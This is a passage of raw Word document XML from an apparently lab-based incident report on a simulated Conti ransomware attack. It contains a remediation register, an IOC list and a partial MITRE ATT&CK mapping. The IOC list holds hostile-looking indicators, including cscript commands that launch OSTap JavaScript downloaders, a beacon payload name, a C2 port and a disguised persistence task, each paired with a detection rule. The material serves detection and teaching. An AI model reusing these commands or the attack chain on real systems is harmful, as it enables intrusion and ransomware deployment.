      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6.3  Remediation Action Register</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2860"/>
        <w:gridCol w:w="893"/>
        <w:gridCol w:w="1194"/>
        <w:gridCol w:w="1199"/>
        <w:gridCol w:w="3214"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286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Action Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="893"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Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199"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Deadline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="321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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286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Deploy custom Rule 100010 (LSASS access → Level 15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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SOC Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="321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Deployed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286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Deploy custom Rule 100020 (FIM burst → Level 15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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SOC Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="321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Deployed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286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Deploy custom Rule 100030 (Scheduled task creation → Level 12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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119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SOC Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="321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Deployed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286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Enable SMB signing on DC01 and FS01 (prevents PtH relay)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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119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Lab Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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 week</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="321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Planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286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Enable Credential Guard on WS-EMP01 (blocks LSASS dump)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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119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Lab Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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 week</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="321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Planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286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Implement Wazuh email alerting for Level 10+ events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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119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SOC Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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 week</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="321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Planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286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Restrict WinRM access to admin subnet only (TCP 5985/5986)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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Lab Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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2 weeks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="321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Planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286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Add Office → scripting host process chain correlation rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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SOC Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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2 weeks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="321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Planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286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Conduct phishing simulation with domain users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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SOC Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199"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2 weeks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="321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Planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286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Document and test full IR playbook (quarterly cadence)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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Team Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199"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Ongoing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="321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 xml:space="preserve">📋 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="10" w:name="_Toc26180"/>
      <w:r>
        <w:rPr/>
        <w:t>IOC Master List</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The following indicators were extracted from Wazuh alerts and forensic analysis. In a production SOC environment, these IOCs would be ingested into a threat intelligence platform (MISP / OpenCTI), shared with sector ISACs, and used to generate blocking rules at the perimeter firewall, DNS sinkhole, and email gateway.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1155"/>
        <w:gridCol w:w="2050"/>
        <w:gridCol w:w="1742"/>
        <w:gridCol w:w="733"/>
        <w:gridCol w:w="1174"/>
        <w:gridCol w:w="2506"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1155"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IOC Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="205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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1742"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="733"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Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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Confidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2506"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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="115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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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10.10.10.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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ATTACK01 — C2 source / attacker host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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1–7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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Block at perimeter; alert on any internal contact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="115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Network Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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TCP 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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Meterpreter / Sliver C2 default port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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1, 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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Alert on any outbound non-standard port to external IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="115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File Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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invoice_Q3.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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Initial reverse shell / beacon payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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Blocklist hash; alert on filename pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="115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File Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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[SHA256: see Wazuh EID 1 alert]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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Malicious payload binary — full hash in Wazuh log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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Submit to VirusTotal; add to AV blocklist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="115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Process Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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WINWORD.EXE → cmd.exe → powershell.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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Office macro execution chain (initial access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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Alert on Office → scripting host parent-child</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="115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Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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cscript.exe //E:jscript [path]\art.jse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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OSTap payload execution — cscript launching .jse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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Alert: cscript.exe executing JS from Temp/Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="115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Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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WindowsUpdateHelper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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Persistence mechanism — disguised as Windows update</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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Alert: EID 4698 with task name not in approved list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="115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NTLM Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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[Hash: creds_all output — see Wazuh EID 10]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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Stolen Domain Admin credential — NTLM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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Invalidated via password reset; monitor re-use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="115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File Extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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.CONTI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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Ransomware encryption marker — Conti signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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FIM alert on mass extension change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="115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File Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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HOW_TO_DECRYPT.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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Conti ransomware note — confirms successful encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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FIM alert on creation; correlate with EXT change burst</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1155"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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="205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cscript //E:jscript OSTapGet.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1742"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OSTap downloader script — Conti initial staging tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="733"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1, 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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Alert on cscript + OSTap filename combination</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1155"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C2 Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="205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C:\Users\Public\art.jse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1742"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Attacker-dropped JS payload in Public folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="733"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="250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FIM alert: file creation in C:\Users\Public\*.js*</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="11" w:name="_Toc6452"/>
      <w:r>
        <w:rPr/>
        <w:t>MITRE ATT&amp;CK Full Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>All simulated techniques map directly to documented Wizard Spider / Conti TTPs as referenced in CISA Advisory AA21-265A and the PWC Ireland HSE Post-Incident Review. Technique selection prioritises fidelity to the real attack over lab convenience.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="10178" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="736"/>
        <w:gridCol w:w="1131"/>
        <w:gridCol w:w="1110"/>
        <w:gridCol w:w="1386"/>
        <w:gridCol w:w="2251"/>
        <w:gridCol w:w="3564"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="818" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736"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Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1131"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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110"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Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1386"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Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2251"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Tool / Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3564" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:start w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="1B3A5C" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Wazuh Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1078" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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T1204.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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User Execution: Malicious File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="225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Atomic Red Team T1204.002 — Office macro → PowerShell → Sliver beacon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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Sysmon EID 1 (proc chain: WINWORD→cmd→PS), EID 3 (outbound C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="896" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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T1566.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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Phishing: Spearphishing Attachment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="225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Simulated phishing document delivery (maldoc)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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N/A (simulated user action — social engineering vector)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1078" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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T1053.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="138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Scheduled Task / Job: Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="225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schtasks.exe — task 'WindowsUpdateHelper'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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Windows EID 4698 (task created) + Custom Rule 100030 → Level 12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1078" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="73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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="111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T1547.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
